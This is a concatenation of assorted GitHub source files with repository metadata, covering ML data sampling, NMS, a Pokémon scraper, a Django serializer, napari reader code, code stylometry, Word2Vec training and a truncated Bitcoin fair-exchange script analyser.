PIL import Image\nimport six\nimport string\nimport numpy as np\nimport lmdb\nimport pickle\nimport tqdm\nimport pyarrow as pa\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport json\nfrom collections import namedtuple\nSegment = namedtuple('Segment', ['video', 'start', 'end', 'label'])\n\"\"\"\nkey\tvalue\nseq-id1\t(feature_seq1, label_seq1)\nseq-id2\t(feature_seq12, label_seq2)\nseq-id3\t(feature_seq3, label_seq3)\n\"\"\"\ndef dumps_pyarrow(obj):\n\t\"\"\"\n\tSerialize an object.\n\tReturns:\n\t\tImplementation-dependent bytes-like object\n\t\"\"\"\n\treturn pa.serialize(obj).to_buffer()\n# data balancing is only applied to training set.\nclass balancing_sampler(object):\n\tdef __init__(self, input_dir, output_path, json_file,\n\t\ttarget_num_seqs = 4732, target_length_seq = 20, \n\t\tmedian_class_duration = 23659):\n\t\t\"\"\"\n\t\tinput_dir: directory containing training .npy features\n\t\toutput_path: lmdb file path to be saved\n\t\tjson_file: training set annotations\n\t\ttarget_num_seqs: for each label, we sample # sequences\n\t\ttarget_length_seq: for each sequence, the length is # in seconds\n\t\tmedian_class_duration: the label with median duration, which is 23659 seconds\n\t\t\"\"\"\n\t\tself.input_dir = input_dir # input directory of the .npy features\n\t\tself.output_path = output_path # lmdb file path\n\t\tself.json_file = json_file\n\t\t# the median class is xiyan, the number of sequences to be samples is 4,732\n\t\t# the sequence length is 5s, 150 frames\n\t\tself.target_num_seqs = target_num_seqs\n\t\tself.target_length_seq = target_length_seq\n\t\tself.median_class_duration = median_class_duration # in seconds\n\t\twith open(self.json_file) as f:\n\t\t\tself.data = json.loads(f.readlines()[0])\n\t\tself.frame_rate = 15. # 15 frame per second \n\t\tself.define_downsample_oversample_groups()\n\n\tdef define_downsample_oversample_groups(self):\n\t\tdata = self.data\n\t\tvideo_ids = data.keys()\n\t\tsegment_label_durati = {}\n\t\tself.segment_list = []\n\t\tself.segment_dict = {}\n\t\tself.sid_2_same_vid_sids = []\n\t\tsid = 0\n\t\tfor vid in tqdm(video_ids):\n\t\t\tsegments = data[vid]\n\t\t\tannotations = segments['annotations']\n\t\t\tfor annot in annotations:\n\t\t\t\tlabel = annot['label']\n\t\t\t\tif label not in segment_label_durati.keys():\n\t\t\t\t\tsegment_label_durati[label] = 0\n\t\t\t\tdura = annot['segment'][1] - annot['segment'][0]\n\t\t\t\tassert dura >=0, \"invalid segment!\"\n\t\t\t\tsegment_label_durati[label] += dura\n\t\t\t\tsegment = Segment(video = vid, start = annot['segment'][0],\n\t\t\t\t\tend = annot['segment'][1], label = label)\n\t\t\t\tif label not in self.segment_dict.keys():\n\t\t\t\t\tself.segment_dict[label] = []\n\t\t\t\tself.segment_list.append(segment)\n\t\t\t\tself.segment_dict[label].append(sid)\n\t\t\t\tsid +=1\n\t\t\tlen_segs = len(annotations)\n\t\t\tfor i in range(len_segs):\n\t\t\t\tstart = sid - len_segs\n\t\t\t\tlist_ids = np.arange(len_segs).tolist()\n\t\t\t\tlist_ids.remove(i)\n\t\t\t\tif list_ids is None or len(list_ids)==0:\n\t\t\t\t\tsame_vid_sids = list()\n\t\t\t\telse:\n\t\t\t\t\tsame_vid_sids = [i+start for i in list_ids]\n\t\t\t\tself.sid_2_same_vid_sids.append(same_vid_sids)\n\t\tassert len(self.sid_2_same_vid_sids) == len(self.segment_list)\n\t\td_group = []\n\t\to_group = []\n\t\tself.label_list = sorted(segment_label_durati.keys())\n\t\tfor label in self.label_list:\n\t\t\tif segment_label_durati[label] < self.median_class_duration:\n\t\t\t\to_group.append(label)\n\t\t\telse:\n\t\t\t\td_group.append(label)\n\t\tself.downsample_labels = d_group\n\t\tself.oversmaple_labels = o_group\n\n\tdef sample_sequences(self, write_frequency=5000):\n\t\tprint(\"Generate LMDB to %s\" % self.output_path)\n\t\tisdir = os.path.isdir(self.output_path)\n\t\tdb = lmdb.open(self.output_path, subdir=isdir,\n\t\t\t\t\t map_size=1099511627776 * 2, readonly=False,\n\t\t\t\t\t meminit=False, map_async=True)\n\n\t\ttxn = db.begin(write=True)\n\t\ti_seq = 0\n\t\tfor i_label, label in enumerate(self.label_list):\n\t\t\tsegment_ids = self.segment_dict[label]\n\t\t\tsame_video_segment_ids = [self.sid_2_same_vid_sids[i] for i in segment_ids]\n\t\t\tif label in self.downsample_labels:\n\t\t\t\tsample_weights = self.random_sample_weights(segment_ids, same_video_segment_ids)\n\t\t\t\tsampled_ids = np.random.choice(np.arange(len(segment_ids)), self.target_num_seqs, p = sample_weights)\n\t\t\t\tfor i, id in enumerate(sampled_ids):\n\t\t\t\t\tsid = segment_ids[id]\n\t\t\t\t\tsegment = self.segment_list[sid]\n\t\t\t\t\tvideo_segment_list = [self.segment_list[id] for id in same_sid]\n\t\t\t\t\tsame_sid = same_video_segment_ids[id]\n\t\t\t\t\tsequence_id = \"{}_{}\".format(segment.video, sid)\n\t\t\t\t\tfeature_seq, label_seq = self.sample_one_segment(segment, video_segment_list)\n\t\t\t\t\ttxn.put(u'{}'.format(i_seq).encode('ascii'), dumps_pyarrow((feature_seq, label_seq )))\n\t\t\t\t\ti_seq +=1\n\t\t\t\t\tprint(\"[{}/{}] Label {} sampling : [{}/{}]\".format(i_label, len(self.label_list), label, i, self.target_num_seqs),end='\\r')\n\t\t\t\t\tif i_seq % write_frequency == 0:\n\t\t\t\t\t\ttxn.commit()\n\t\t\t\t\t\ttxn = db.begin(write=True)\n\t\t\t\t\tdel feature_seq, label_seq\n\t\t\telse:\n\t\t\t\tfor i, (sid, same_sid) in enumerate(zip(segment_ids, same_video_segment_ids)):\n\t\t\t\t\tsegment = self.segment_list[sid]\n\t\t\t\t\tvideo_segment_list = [self.segment_list[id] for id in same_sid]\n\t\t\t\t\tsequence_id = \"{}_{}\".format(segment.video, sid)\n\t\t\t\t\tfeature_seq, label_seq = self.sample_one_segment(segment, video_segment_list)\n\t\t\t\t\ttxn.put(u'{}'.format(i_seq).encode('ascii'), dumps_pyarrow((feature_seq, label_seq )))\n\t\t\t\t\ti_seq +=1\n\t\t\t\t\tif i_seq % write_frequency == 0:\n\t\t\t\t\t\ttxn.commit()\n\t\t\t\t\t\ttxn = db.begin(write=True)\n\t\t\t\t\tdel feature_seq, label_seq\n\t\t\t\t\tprint(\"[{}/{}] Label {} sampling : [{}/{}]\".format(i_label, len(self.label_list), label, i, self.target_num_seqs),end='\\r')\n\t\t\t\t\tif i == self.target_num_seqs - 1:\n\t\t\t\t\t\tbreak\n\t\t\t\tif i + 1 < self.target_num_seqs:\n\t\t\t\t\tN = self.target_num_seqs - (i+1)\n\t\t\t\t\tsample_weights = self.random_sample_weights(segment_ids, same_video_segment_ids)\n\t\t\t\t\tsampled_ids = np.random.choice(np.arange(len(segment_ids)), N, p = sample_weights)\n\t\t\t\t\tfor id in sampled_ids:\n\t\t\t\t\t\tsid = segment_ids[id]\n\t\t\t\t\t\tsame_sid = same_video_segment_ids[id]\n\t\t\t\t\t\tsequence_id = \"{}_{}\".format(segment.video, sid)\n\t\t\t\t\t\tfeature_seq, label_seq = self.sample_one_segment(segment, video_segment_list)\n\t\t\t\t\t\ttxn.put(u'{}'.format(i_seq).encode('ascii'), dumps_pyarrow((feature_seq, label_seq )))\n\t\t\t\t\t\ti_seq +=1\n\t\t\t\t\t\tif i_seq % write_frequency == 0:\n\t\t\t\t\t\t\ttxn.commit()\n\t\t\t\t\t\t\ttxn = db.begin(write=True)\n\t\t\t\t\t\tdel feature_seq, label_seq\n\t\t\t\t\t\ti+=1\n\t\t\t\t\t\tprint(\"[{}/{}] Label {} sampling : [{}/{}]\".format(i_label, len(self.label_list), label, i, self.target_num_seqs),end='\\r')\n\t\tprint(\"All labels are sampled.\")\n\t\t# finish iterating \n\t\ttxn.commit()\n\t\tkeys = [u'{}'.format(k).encode('ascii') for k in range(i_seq + 1)]\n\t\twith db.begin(write=True) as txn:\n\t\t\ttxn.put(b'__keys__', dumps_pyarrow(keys))\n\t\t\ttxn.put(b'__len__', dumps_pyarrow(len(keys)))\n\t\tprint(\"Database saved to %s\"%self.output_path)\n\t\tdb.sync()\n\t\tdb.close()\n\n\tdef random_sample_weights(self, segment_ids, same_video_segment_ids):\n\t\tweights = [1/float(len(ids)+1) for ids in same_video_segment_ids]\n\t\treturn np.array(weights)/np.sum(np.array(weights))\n\tdef downsample(self, segments):\n\t\tlen_segs = len(segments)\n\n\tdef sample_one_segment(self, input_segment, video_segment_list):\n\t\tvideo = input_segment.video\n\t\tlabel = input_segment.label\n\t\tnpy_fpath = os.path.join(self.input_dir, '%s.npy'%video)\n\t\ttarget_length = int(self.target_length_seq * self.frame_rate) #10 * 15 = 150\n\t\ttarget_length = self.frame_length_to_feature_length(target_length) #floor(150/8)\n\t\ttry:\n\t\t\tfeature = np.load(npy_fpath)\n\t\texcept:\n\t\t\traise ValueError(\"{} does not exist!\".format(npy_fpath))\n\t\tmaximum_f_id = feature.shape[0]\n\t\tif maximum_f_id <= target_length:\n\t\t\tN = target_length - maximum_f_id\n\t\t\tif N == 0:\n\t\t\t\tfeature_ids = np.arange(maximum_f_id)\n\t\t\telse:\n\t\t\t\tfeature_ids = np.concatenate([np.arange(maximum_f_id), np.array([maximum_f_id-1]*N).astype(np.int)])\n\t\t\tfeature_seq = feature[feature_ids,:]\n\t\t\tx = self.label_list.index(label)\n\t\t\tlabel_seq = np.eye(len(self.label_list))[np.ones(target_length).astype(np.int)*x]\n\t\telse:\n\t\t\tsampled_start, sampled_end = self.randomly_select_seq_range(input_segment.start, input_segment.end,\n\t\t\t\tmaximum = maximum_f_id)\n\n\t\t\tif sampled_end - sampled_start + 1 != target_length:\n\t\t\t\tN = target_length - (sampled_end - sampled_start + 1)\n\t\t\t\tif N < 0:\n\t\t\t\t\tsampled_end = sampled_end + N\n\t\t\t\t\tfeature_ids = np.arange(sampled_start, sampled_end+1)\n\t\t\t\telse:\n\t\t\t\t\tif sampled_end == maximum_f_id - 1:\n\t\t\t\t\t\tfeature_ids = np.concatenate([np.arange(sampled_start, sampled_end+1), np.array([maximum_f_id - 1]*N).astype(np.int)])\n\t\t\t\t\telif sampled_start == 0:\n\t\t\t\t\t\tfeature_ids = np.concatenate([np.zeros(N).astype(np.int), np.arange(sampled_start, sampled_end+1)])\n\t\t\t\t\telse:\n\t\t\t\t\t\tfeature_ids = np.concatenate([np.arange(sampled_start, sampled_end+1), np.array([sampled_end]*N).astype(np.int)])\n\t\t\telse:\n\t\t\t\tfeature_ids = np.arange(sampled_start, sampled_end + 1)\n\t\t\tfeature_seq = feature[feature_ids,:]\n\t\t\tx = self.label_list.index(label)\n\t\t\tlabel_seq = np.eye(len(self.label_list))[np.ones(target_length).astype(np.int)*x]\n\t\t\tout_of_range = feature_ids < self.second_2_id(input_segment.start)\n\t\t\tlabel_seq[out_of_range] = np.zeros_like(label_seq[out_of_range])\n\t\t\tout_of_range = feature_ids > self.second_2_id(input_segment.end)\n\t\t\tlabel_seq[out_of_range] = np.zeros_like(label_seq[out_of_range])\n\t\tlabel_seq = self.detect_mutiple_labels(label_seq, feature_ids, video_segment_list)\n\t\tlabel_seq = np.clip(label_seq, 0, 1)\n\t\treturn feature_seq, label_seq \n\t\n\tdef detect_mutiple_labels(self, label_seq, input_feature_range, video_segment_list):\n\t\tif len(video_segment_list) == 0:\n\t\t\treturn label_seq\n\t\tfor segment in video_segment_list:\n\t\t\tstart, end = segment.start, segment.end\n\t\t\tsegment_feature_range = np.arange(self.second_2_id(start), self.second_2_id(end)+1)\n\t\t\tintersection, intersection_id, _ = np.intersect1d(input_feature_range, segment_feature_range, return_indices=True)\n\t\t\tif len(intersection) == 0:\n\t\t\t\treturn label_seq\n\t\t\telse:\n\t\t\t\tN = len(intersection)\n\t\t\t\tnew_label = self.label_list.index(segment.label)\n\t\t\t\tnew_label = np.eye(len(self.label_list))[np.ones(N).astype(np.int)*new_label]\n\t\t\t\tlabel_seq[intersection_id] = label_seq[intersection_id] + new_label\n\t\t\t\treturn label_seq\n\n\tdef randomly_select_seq_range(self, start, end, maximum):\n\t\ttarget_length = int(self.target_length_seq * self.frame_rate) #10 * 15 = 150\n\t\ttarget_length = self.frame_length_to_feature_length(target_length) #floor(150/8)\n\t\tsearch_ids = np.arange(self.second_2_id(start), self.second_2_id(end)+1)\n\t\tsampled_middle = np.random.choice(search_ids, 1)[0]\n\t\tnew_start = sampled_middle - target_length // 2\n\t\tnew_end = sampled_middle + target_length // 2 - 1\n\t\tif new_start <0:\n\t\t\tnew_start = 0\n\t\t\tnew_end = new_start + target_length - 1\n\t\tif new_end > maximum - 1:\n\t\t\tnew_end = maximum - 1\n\t\t\tnew_start = new_end - target_length + 1\n\t\treturn max(0, new_start), min(new_end, maximum-1)\n\t\t\n\tdef second_2_id(self, input_time):\n\t\tframe_id = input_time*self.frame_rate\n\t\tfeature_id = self.frame_length_to_feature_length(frame_id)\n\t\treturn feature_id - 1\n\tdef id_2_second(self, input_feature_id):\n\t\tinput_frame_id_min, input_frame_id_max = self.feature_length_to_frame_length(input_feature_id+1)\n\t\ttime = (input_frame_id_min+input_frame_id_max)*0.5/self.frame_rate\n\t\treturn time\n\tdef feature_length_to_frame_length(self, N):\n\t\treturn int(N*8), int((N+1)*8)\n\tdef frame_length_to_feature_length(self, T):\n\t\treturn int(np.floor(T/8))\n\nif __name__=='__main__':\n\tsampler = balancing_sampler(input_dir = '../../data/Train/i3d_features',\n\t\toutput_path = '../../user_data/Train/i3d_features.lmdb',\n\t\tjson_file = '../../data/Train/train_annotations.json')\n\tsampler.sample_sequences()\n\n\tsave_label_list = \"../../user_data/label_list.txt\"\n\twith open(save_label_list, 'w') as out:\n\t\tout.write(\",\".join(sampler.label_list))\n\t\n\n\n\n","repo_name":"wtomin/video_event_detection_2020_submission","sub_path":"code/data_balancing_sampler/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26984297435","text":"import numpy as np\n\ndef non_maximum_suppression(scores, num_proposals, iou_thresholds, bounding_box_coordinates):\n \"\"\"\n Input Parameters:\n 1.\tscores: A numpy array containing confidence scores for each bounding box proposal. \n Each row represents a proposal, and there's a single confidence score associated with it.\n 2.\tnum_proposals: An integer representing the desired number of retained proposals after applying NMS.\n 3.\tiou_thresholds: A threshold value representing the Intersection over Union (IoU) overlap threshold. If two bounding boxes have an IoU greater than this threshold, one of them will be suppressed.\n 4.\tbounding_box_coordinates: A numpy array containing the coordinates of bounding box proposals. \n Each row represents a proposal, and columns 1 to 4 represent the (x1, y1, x2, y2) coordinates of the bounding box, while the last column (index 5) contains the index of the proposal.\n Post-processing:\n If the loop completes without selecting the desired number of proposals, the last selected proposal is added repeatedly until the desired count is reached.\n Output: \n The function returns a numpy array containing the indices of the selected proposals after NMS.\n \n \"\"\" \n if not (isinstance(scores, np.ndarray) and len(scores.shape) == 2 and scores.shape[1] == 1):\n raise TypeError('scores array is not in the correct format')\n\n num_windows = scores.shape[0]\n indexed_coordinates = np.concatenate((scores, bounding_box_coordinates), axis=1)\n\n indices = np.argsort(indexed_coordinates[:, 0])\n indexed_coordinates_with_indices = np.concatenate((indexed_coordinates, np.arange(0, num_windows).reshape(num_windows, 1)), axis=1)[indices]\n selected_indices = []\n\n remaining_windows = indexed_coordinates_with_indices\n\n while remaining_windows.any():\n current_window = remaining_windows[-1]\n selected_indices.append(current_window[5])\n\n if len(selected_indices) == num_proposals:\n return np.array(selected_indices).reshape(1, num_proposals).astype(np.int64)\n \n remaining_windows = remaining_windows[:-1]\n\n start_max = np.maximum(remaining_windows[:, 1:3], current_window[1:3])\n end_min = np.minimum(remaining_windows[:, 3:5], current_window[3:5])\n lengths = end_min - start_max + 1\n intersection_area = lengths[:, 0] * lengths[:, 1]\n intersection_area[np.logical_or(lengths[:, 0] < 0, lengths[:, 1] < 0)] = 0\n iou_map_current = intersection_area / (\n (remaining_windows[:, 3] - remaining_windows[:, 1] + 1) * \n (remaining_windows[:, 4] - remaining_windows[:, 2] + 1) +\n (current_window[3] - current_window[1] + 1) * \n (current_window[4] - current_window[2] + 1) - intersection_area)\n \n remaining_windows = remaining_windows[iou_map_current <= iou_thresholds]\n\n while len(selected_indices) != num_proposals:\n selected_indices.append(current_window[5])\n\n return np.array(selected_indices).reshape(1, -1).astype(np.int64)\n","repo_name":"MAXNORM8650/MSFM","sub_path":"models/modified_NMS.py","file_name":"modified_NMS.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"34283469793","text":"from typing import List\n\n\nclass Array:\n\n def find_median(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"\n Approach: Binary Search\n Time Complexity: O(log(min(m,n)))\n Space Complexity: O(1)\n :param nums1:\n :param nums2:\n :return:\n \"\"\"\n if len(nums1) > len(nums2):\n nums1, nums2 = nums2, nums1\n\n x, y = len(nums1), len(nums2)\n\n left, right = 0, x\n\n while left <= right:\n\n pX = left + (right - left) // 2\n pY = (x + y + 1) // 2 - pX\n\n l1 = float(\"-inf\") if pX == 0 else nums1[pX - 1]\n r1 = float(\"inf\") if pX == x else nums1[pX]\n\n l2 = float(\"-inf\") if pY == 0 else nums2[pY - 1]\n r2 = float(\"inf\") if pY == y else nums2[pY]\n\n if l1 > r2:\n right = pX - 1\n elif l2 > r1:\n left = pX + 1\n else:\n if (x + y) % 2 == 1: # odd\n return max(l1, l2)\n else:\n return (max(l1, l2) + min(r1, r2)) / 2.0\n\n\nif __name__ == \"__main__\":\n\n array = Array()\n print(array.find_median([1, 3], [2]))\n print(array.find_median([1, 2], [3, 4]))\n","repo_name":"Shiv2157k/leet_code","sub_path":"goldman_sachs/median_in_two_sorted_array.py","file_name":"median_in_two_sorted_array.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"12722853641","text":"# this part scrapes the correct table from wiki\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = \"https://en.wikipedia.org/wiki/List_of_Pok%C3%A9mon\"\n\nresponse = requests.get(url)\nhtml_content = response.content\n\nsoup = BeautifulSoup(html_content, \"html.parser\")\n\ntables = soup.find_all(\"table\", {\"class\": \"wikitable\"})\n# select 3rd table on page, 3rd row, every other td and makes into str\ngeneration_table = tables[2]\ngeneration_row = generation_table.find_all(\"tr\")[2]\nbreak_points = [int(td.string) for td in generation_row.find_all(\"td\")[::2]]\n\nimport csv\n\noriginal_file_path = \"./pokemon_list.csv\"\nwith open(original_file_path, \"r\") as original_file:\n csv_reader = csv.reader(original_file)\n \n current_break = 0 # Index for the break_points list\n current_file_number = 1\n output_file_path = f\"generation{current_file_number}.csv\"\n\n output_file = open(output_file_path, \"w\", newline=\"\")\n csv_writer = csv.writer(output_file)\n \n # Loop through the original file and write rows to smaller files\n for index, row in enumerate(csv_reader, start=1):\n csv_writer.writerow(row)\n \n if index == break_points[current_break]:\n current_break += 1\n current_file_number += 1\n \n output_file.close()\n \n output_file_path = f\"generation{current_file_number}.csv\"\n output_file = open(output_file_path, \"w\", newline=\"\")\n csv_writer = csv.writer(output_file)\n \n output_file.close()","repo_name":"DorotaBjoorn/Data-Engineering-Dorota-Bjoorn","sub_path":"excercises/Ex02_docker_compose/src/generations_to_csv.py","file_name":"generations_to_csv.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"73793170993","text":"\"\"\"\nserializer details class for Contract model\n@create : function for adding author id at creation\n@author : Sylvain GAUTHIER\n@version : 1.0\n\"\"\"\n\nfrom rest_framework.serializers import SerializerMethodField\nfrom rest_framework import serializers\n\nfrom .contractbaseserializer import ContractBaseSerializer\nfrom crmapi.serializers.event_serializers.eventlistserializer import \\\n EventListSerializer\nfrom crmapi.serializers.client_serializers.clientlistserializer import \\\n ClientListSerializer\n\nfrom crmapi.models.contract import Contract\nfrom crmapi.models.client import Client\nfrom crmapi.models.event import Event\n\n\nclass ContractDetailSerializer(ContractBaseSerializer):\n id = serializers.ReadOnlyField()\n event = SerializerMethodField()\n client = SerializerMethodField()\n\n class Meta:\n model = Contract\n fields = [\n 'id',\n 'client',\n 'date_created',\n 'date_updated',\n 'status',\n 'event',\n 'amount',\n 'payment_due'\n ]\n\n def get_event(self, instance):\n if instance.event:\n queryset = Event.objects.filter(pk=instance.event.id)\n serializer = EventListSerializer(queryset, many=True)\n return serializer.data\n\n def get_client(self, instance):\n if instance.client:\n queryset = Client.objects.filter(pk=instance.client.id)\n serializer = ClientListSerializer(queryset, many=True)\n return serializer.data\n","repo_name":"SGauthier2Pro/P12_CRM_Epic_Events_API","sub_path":"crmepicevents/crmapi/serializers/contract_serializers/contractdetailserializer.py","file_name":"contractdetailserializer.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29922740455","text":"#!/usr/bin/env python\ndef eggs(someEggs) :\n\tsomeEggs.append('spam')\n\nspam = ['bacon','sausage','egg']\nprint(spam)\neggs(spam)\nprint(spam)\n\n# even though 'someEggs' is destroyed after the function ends for not being a global variable\n# it's only receiving the reference to the list 'spam', not the actual value.\n# what was append in to the memory, which will reflect to the same result 'spam' is referring\n# 'spam' and 'someEggs' are mutable, their value is stored in memory\n# a string for instance is immutable, its value must be reassigned in place\n","repo_name":"tgmrks/python-samples","sub_path":"multable_immutable_values.py","file_name":"multable_immutable_values.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"46625752160","text":"from distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\next_modules = [Extension('Exact_Integration',\n ['Exact_Integration.pyx'],\n )]\nsetup(\n name='Exact_Integration',\n cmdclass={'build_ext': build_ext},\n ext_modules=ext_modules\n)\n#python setup.py build_ext -i clean\n","repo_name":"BinWang0213/PyBEM2D","sub_path":"PyBEM2D/BEM_Solver/Elements/deprecated/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"39"} +{"seq_id":"37489304198","text":"from functools import wraps\nfrom typing import List, Optional\n\nfrom npe2._pydantic_compat import Extra, Field\nfrom npe2.manifest.utils import Executable, v2_to_v1\nfrom npe2.types import ReaderFunction\n\n\nclass ReaderContribution(Executable[Optional[ReaderFunction]]):\n \"\"\"Contribute a file reader.\n\n Readers may be associated with specific **filename_patterns** (e.g. \"*.tif\",\n \"*.zip\") and are invoked whenever `viewer.open('some/path')` is used on the\n command line, or when a user opens a file in the graphical user interface by\n dropping a file into the canvas, or using `File -> Open...`\n \"\"\"\n\n command: str = Field(\n ..., description=\"Identifier of the command providing `napari_get_reader`.\"\n )\n filename_patterns: List[str] = Field(\n ...,\n description=\"List of filename patterns (for fnmatch) that this reader can \"\n \"accept. Reader will be tried only if `fnmatch(filename, pattern) == True`. \"\n \"Use `['*']` to match all filenames.\",\n )\n accepts_directories: bool = Field(\n False, description=\"Whether this reader accepts directories\"\n )\n\n class Config:\n extra = Extra.forbid\n\n def __hash__(self):\n return hash(\n (self.command, tuple(self.filename_patterns), self.accepts_directories)\n )\n\n def exec(self, *, kwargs):\n \"\"\"\n We are trying to simplify internal npe2 logic to always deal with a\n (list[str], bool) pair instead of Union[PathLike, Seq[Pathlike]]. We\n thus wrap the Reader Contributions to still give them the old api. Later\n on we could add a \"if manifest.version == 2\" or similar to not have this\n backward-compatibility logic for new plugins.\n \"\"\"\n kwargs = kwargs.copy()\n stack = kwargs.pop(\"stack\", None)\n assert stack is not None\n kwargs[\"path\"] = v2_to_v1(kwargs[\"path\"], stack)\n callable_ = super().exec(kwargs=kwargs)\n\n if callable_ is None: # pragma: no cover\n return None\n\n @wraps(callable_)\n def npe1_compat(paths, *, stack):\n path = v2_to_v1(paths, stack)\n return callable_(path)\n\n return npe1_compat\n","repo_name":"napari/npe2","sub_path":"src/npe2/manifest/contributions/_readers.py","file_name":"_readers.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"39"} +{"seq_id":"22844247643","text":"\nfrom modules.layout import layoutAnalysis\nfrom modules.lexical import lexicalAnalisys\nfrom modules.vectorizer import vectorizeFileInLines, vectorizeFile\n\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\n\nimport glob\nimport os\nimport sys\n\n\ndef printTestsPredicts(y_test, predictedAuthor):\n print(\"\\n\\nTests: \")\n erros = 0\n for a, b in zip(y_test, predictedAuthor):\n\n if a == b:\n print(f'{a} = {b}: V')\n if a != b:\n print(f'{a} != {b}: F')\n erros += 1\n\n print(f'Total: {len(y_test)}')\n print(f'Erros: {erros}')\n\nif os.name == \"posix\":\n filesPath = glob.glob(input(\"Type the path to the training files: \").replace(\"'\", \"\") + \"/*/*.cpp\")\n filesLabels = [path.split(\"/\")[-2] for path in filesPath]\n\nelif os.name == \"nt\":\n filesPath = glob.glob(input(\"Type the path to the training files: \").replace(\"'\", \"\") + \"\\*\\*.cpp\")\n filesLabels = [path.split(\"\\\\\")[-2] for path in filesPath]\n\n# vectorizeFileInLines vectorizes files and separates the lines so each file is represented as list[str] so the total set is list(vectorizedFilesInLines)[list(each file)[str(each line)]]\nvectorizedFilesInLines = [vectorizeFileInLines(path) for path in filesPath]\n# vectorizeFile vectorizes files and each file is represented as str so the total set is list(vectorizedFilesWhole)[str(each file)]\nvectorizedFilesWhole = [vectorizeFile(path) for path in filesPath]\n\n# this generates the data sets for each type of analysis\nfilesLayoutData = layoutAnalysis(vectorizedFilesInLines)\nfilesLexicalData = lexicalAnalisys(vectorizedFilesWhole)\n\n# this sums the two data sets so each file is represented as a list of features\nfilesData = np.concatenate((filesLayoutData, filesLexicalData), axis=1)\nprint(filesData[0])\n\nx_train, x_test, y_train, y_test = train_test_split(filesData, filesLabels, test_size=0.3)\n\n# Geração do modelo por processo de machine learning com os dados dos arquivos conhecidos\nknn = KNeighborsClassifier(metric=\"cityblock\", n_neighbors=1, algorithm=\"brute\")\nknn.fit(x_train, y_train)\n\n\n\n# Previsão sobre de quem o arquivo misterioso é\npredictedAuthor = knn.predict(x_test)\n\n# Calculo da precisão do modelo\nprint(f'Accuracy: {accuracy_score(y_test, predictedAuthor) * 100}')\n\nif \"-v\" in sys.argv:\n printTestsPredicts(y_test, predictedAuthor)\n","repo_name":"Jbernardiss/codeStylometryResearch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"26903602749","text":"import gensim\nfrom typing import Iterator, List\nimport os\n\n# Absolute path\nABSOLUTE_PATH = f\"{os.getcwd()}/\"\n\n# The location of our training data RELATIVE to this python file\nTRAINING_DATA = \"../wikipedia_scraping/output_data/scrape_output.txt\"\n\n# Method to read in our training data\ndef read_input(input_file:str) -> Iterator[List[str]]:\n with open(input_file, 'r') as f: # do gzip.open for gzipped files\n for i, line in enumerate(f):\n # do some pre-processing and return list of words for each review\n # text\n if (i % 1000 == 0):\n print(f\"Processed {i} lines\")\n\n tokenized_line = gensim.utils.simple_preprocess(line)\n yield tokenized_line\n\n\nif __name__ == '__main__':\n\n # Get the full path of our training data file\n data_file = os.path.join(ABSOLUTE_PATH, TRAINING_DATA)\n\n # Get our tokenized input into a list\n # Every line has become a list of words\n # So this is a two dimensional matrix\n documents = list(read_input(data_file))\n\n\n print(\"Building vocabulary in Word2Vec model...\")\n \n # Build the model's vocabulary\n model = gensim.models.Word2Vec(\n documents,\n vector_size=125,\n window=10,\n min_count=2,\n workers=10)\n\n print(\"Training Word2Vec model...\")\n # Train the model\n model.train(documents, total_examples=len(documents), epochs=15)\n\n # Save the model\n model.save(os.path.join(ABSOLUTE_PATH, \"saved_models/my_model\"))\n\n # Save the vectors\n model.wv.save(os.path.join(ABSOLUTE_PATH, \"saved_vectors/my_vectors\"))\n\n # Report that we've finished training\n print(\"\\n FINISHED TRAINING! \\n\")\n print(f\"Model's total vocabulary: {len(model.wv.key_to_index)}\")\n","repo_name":"smallblue2/Word2Vec-with-Wikipedia","sub_path":"word2vec/train_word2vec.py","file_name":"train_word2vec.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"14247241522","text":"import tools\nimport re\nfrom time import sleep\n\n# import blocksci\n\nmysql = tools.connect_mysql()\nrpc = tools.connect_prc()\npattern = re.compile(r' OP_CHECKSIGVERIFY OP_IF .* OP_CHECKSIG OP_ELSE .* (OP_EQUAL.*OP_SWAP.*OP_BOOLOR|OP_EQUALVERIFY.*OP_EQUAL.*) .* OP_ENDIF')\n\nwith mysql.cursor() as cursor:\n cursor.execute(\"SELECT COUNT(*) FROM fair_exchange;\")\n result = cursor.fetchall()\n num = result[0]['COUNT(*)']\n\nf = open(\"fe_asm.txt\", \"w\")\nf2 = open(\"fe_out_asm.txt\", \"w\")\ncounter = 0\nfor n in range(0, num, 1000):\n with mysql.cursor() as cursor:\n cursor.execute(\"SELECT * FROM fair_exchange LIMIT %d, 1000;\" % n)\n txs = cursor.fetchall()\n\n for i in range(len(txs)):\n tx = txs[i]\n height = tx['height']\n print(\"\\rCurrent height: %d\" % height, end=\"\", flush=True)\n tx = 